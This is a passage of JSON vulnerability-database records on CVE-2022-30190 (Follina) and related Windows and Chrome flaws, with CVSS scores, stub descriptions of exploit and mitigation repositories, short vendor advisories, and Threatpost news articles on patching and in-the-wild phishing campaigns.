false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-02-14T18:19:06", "id": "2D9FF49E-AD93-5397-80B0-B02DED73DEA6", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T20:35:42", "description": "# Follina-CVE-2022-30190 Proof of Concept by Nee\n\n## Usage\n```ba...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-05T13:54:04", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-02-09T18:20:51", "id": "F437A0D1-7913-51F2-9D43-8BC2DE62A636", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T20:34:23", "description": "[![](https://forthebadge.com/images/badges/made-with-python.svg)...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-09T09:32:10", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-10-23T21:52:10", "id": "D70A4D0B-027B-57A1-B882-C70D16FCA9C3", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T20:38:29", "description": "# mitigate-folina\nMitigates the \"Folina\"-ZeroDay (CVE-2022-30190...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T09:30:13", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-09T12:18:29", "id": "005DDBE6-0F17-58D7-9DC2-4D1F01F2A8FD", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T20:39:10", "description": "# CVE-2022-30190\n\n> On Monday May 30, 2022, Microsoft issued CVE...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-31T18:00:42", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-09-28T11:39:17", "id": "FFA2D3A3-AFD4-580B-8424-EE4844976B65", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T20:30:39", "description": "# folli...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-15T09:13:05", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-15T09:15:12", "id": "0E951B86-8BC4-54D9-BE2B-7B5DD988D1A0", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T20:26:34", "description": "# Follina-CVE-2022-30190 Proof of Concept by Nee\n\n## Usage\n```ba...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-05T13:54:04", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-02-09T18:20:51", "id": "66A7ADCB-1EAD-519B-9B1F-5694A2860BA1", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T20:28:33", "description": "# Follina-CVE-2022-30190-Sample-by-ethical-blue\n Educational Fol...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-25T16:27:59", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-07-01T22:51:35", "id": "37F78533-E96A-5433-B558-90DB82C0BB27", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T20:34:01", "description": "# CVE-2022-30190\nMitigation for CVE-2022-30190\n\nScript requires ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-10T00:23:11", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-10T00:25:47", "id": "8FDF5020-8C7F-5695-ADD0-58100BD21FFF", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T20:34:21", "description": "# Follina workaround (CVE-2022-30190)\n\n## Description\nThese two ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-08T14:20:50", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-08T14:29:37", "id": "F96D1468-D4E5-54F8-A03B-503ABF9BC416", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T20:39:03", "description": "```console\n$ gollina -h\n\n gollina\n Follina MS-MSDT 0-day MS Of...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T09:02:00", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-12-04T18:13:01", "id": "FC455648-370A-582B-A03A-6299DDC272F6", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-02T22:59:07", "description": "# CVE-2022-30190-mass\nCVE-2022-30190 Zero click rce Mass Exploit...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T09:19:34", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-01T09:39:02", "id": "FAF36735-05C9-50E1-B458-BA2E15B5EB99", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-08T01:45:01", "description": "# follina_cve_2022-30190\nA proof of concept to CVE-2022-30190 (f...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-10T14:57:17", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-09-27T02:17:48", "id": "BAA0F684-952E-5B9E-B207-0419A33AC53B", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "checkpoint_advisories": [{"lastseen": "2022-07-16T17:58:18", "description": "An elevation of privilege vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-12T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows Client/Server Runtime Subsystem Elevation of Privilege (CVE-2022-22047)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22047"], "modified": "2022-07-12T00:00:00", "id": "CPAI-2022-0362", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-13T22:33:51", "description": "A heap buffer overflow vulnerability exists in Google Chrome WebRTC. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-09-22T00:00:00", "type": "checkpoint_advisories", "title": "Google Chrome WebRTC Heap Buffer Overflow (CVE-2022-2294)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-2294"], "modified": "2022-09-22T00:00:00", "id": "CPAI-2022-0566", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-02T17:59:17", "description": "A remote code execution vulnerability exists in Microsoft Support Diagnostic Tool, also known as, \"Follina\". Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Support Diagnostic Tool Remote Code Execution (CVE-2022-30190)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-01T00:00:00", "id": "CPAI-2022-0283", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2022-07-18T12:20:51", "description": "A Windows 11 vulnerability, part of Microsoft\u2019s Patch Tuesday roundup of fixes, is being exploited in the wild, prompting the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to advise patching of the elevation of privileges flaw by August 2.\n\nThe recommendation is directed at federal agencies and concerns [CVE-2022-22047](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22047>), a vulnerability that carries a CVSS score of high (7.8) and exposes Windows Client Server Runtime Subsystem (CSRSS) used in Windows 11 (and earlier versions dating back to 7) and also Windows Server 2022 (and earlier versions 2008, 2012, 2016 and 2019) to attack.\n\n_[[**FREE On-demand Event**](<https://threatpost.com/webinars/securely-access-your-machines-from-anywhere-presented-by-keeper-security/>): **Join Keeper Security\u2019s Zane Bond in a Threatpost roundtable and learn how to securely access your machines from anywhere and share sensitive documents from your home office.** **[WATCH HERE](<https://threatpost.com/webinars/securely-access-your-machines-from-anywhere-presented-by-keeper-security/>)**.]_\n\nThe CSRSS bug is an elevation of privileges vulnerability that allows adversaries with a pre-established foothold on a targeted system to execute code as an unprivileged user. When the bug was first reported by Microsoft\u2019s own security team earlier this month it was classified as a zero-day, or a known bug with no patch. That patch was made available on [Tuesday July 5](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22047>).\n\nResearchers at FortiGuard Labs, a division of Fortinet, said the threat the bug poses to business is \u201cmedium\u201d. [In a bulletin, researchers explain](<https://www.fortiguard.com/threat-signal-report/4671/known-active-exploitation-of-windows-csrss-elevation-of-privilege-vulnerability-cve-2022-22047>) the downgraded rating because an adversary needs advanced \u201clocal\u201d or physical access to the targeted system to exploit the bug and a patch is available.\n\nThat said, an attacker who has previously gained remote access to a computer system (via malware infection) could exploit the vulnerability remotely.\n\n\u201cAlthough there is no further information on exploitation released by Microsoft, it can be surmised that an unknown remote code execution allowed for an attacker to perform lateral movement and escalate privileges on machines vulnerable to CVE-2022-22047, ultimately allowing for SYSTEM privileges,\u201d FortiGuard Labs wrote.\n\n## Office and Adobe Documents Entry Points\n\nWhile the vulnerability is being actively exploited, there are no known public proof of concept exploits in the wild that can be used to help mitigate or sometimes fuel attacks, according to a [report by The Record](<https://therecord.media/cisa-adds-windows-bug-to-exploited-list-urges-agencies-to-patch-by-august-2/>).\n\n\u201cThe vulnerability allows an attacker to execute code as SYSTEM, provided they can execute other code on the target,\u201d wrote Trend Micro\u2019s [Zero Day Initiative (ZDI) in its Patch Tuesday](<https://www.zerodayinitiative.com/blog/2022/7/12/the-july-2022-security-update-review>) roundup last week.\n\n\u201cBugs of this type are typically paired with a code execution bug, usually a specially crafted Office or Adobe document, to take over a system. These attacks often rely on macros, which is why so many were disheartened to hear Microsoft\u2019s delay in blocking all Office macros by default,\u201d wrote ZDI author Dustin Childs.\n\nMicrosoft recently said it would block the use of Visual Basic for Applications (VBA) macros by default in some of its Office apps, however set no timeline enforce the policy.\n\nCISA [added the Microsoft bug to its running list](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) of known exploited vulnerabilities on July 7 (search \u201cCVE-2022-22047\u201d to find the entry) and recommends simply, \u201capply updates per vendor instructions\u201d.\n\n_[[**FREE On-demand Event**](<https://threatpost.com/webinars/securely-access-your-machines-from-anywhere-presented-by-keeper-security/>): **Join Keeper Security\u2019s Zane Bond in a Threatpost roundtable and learn how to securely access your machines from anywhere and share sensitive documents from your home office.** **[WATCH HERE](<https://threatpost.com/webinars/securely-access-your-machines-from-anywhere-presented-by-keeper-security/>)**.]_\n\nImage: Courtesy of Microsoft\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-18T12:19:26", "type": "threatpost", "title": "CISA Urges Patch of Exploited Windows 11 Bug by Aug. 2", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22047"], "modified": "2022-07-18T12:19:26", "id": "THREATPOST:781705ADC10B0D40FC4B8D835FA5EA6D", "href": "https://threatpost.com/cisa-urges-patch-11-bug/180235/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-07T12:48:32", "description": "Researchers have added state-sponsored hackers to the list of adversaries attempting to exploit Microsoft\u2019s now-patched Follina vulnerability. According to researchers at Proofpoint, state-sponsored hackers have attempted to abuse the Follina vulnerability in Microsoft Office, aiming an email-based exploit at U.S. and E.U. government targets via phishing campaigns.\n\nProofpoint researchers spotted the attacks and believe the adversaries have ties to a government, which it did not identify. Attacks consist of campaigns targeting victims U.S. and E.U. government workers. Malicious emails contain fake recruitment pitches promising a 20 percent boost in salaries and entice recipients to download an accompanying attachment.\n\nIn a Twitter-based statement, Sherrod DeGrippo, vice president of threat research at Proofpoint, said about 10 Proofpoint customers had received over 1,000 such messages.\n\nThe malicious attachment targets the remote code execution bug [CVE-2022-30190](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190>)_, dubbed _Follina.\n\n[Discovered](<https://twitter.com/nao_sec/status/1530196847679401984>) last month, the flaw exploits the Microsoft Windows Support Diagnostic Tool. As Microsoft explained in a [blog post](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>), the bug \u201cexists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application.\u201d\n\nState-sponsored abuse of the flaw is just the latest in a string of Follina-related attacks.\n\nIf successfully exploited, attackers can use the Follina flaw to install programs, view, change or delete data, or create new accounts in the context allowed by the user\u2019s rights, the company said.\n\n\u201cA remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word,\u201d Microsoft explained in [its guidance](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) on the Microsoft Security Response Center. \u201cAn attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling 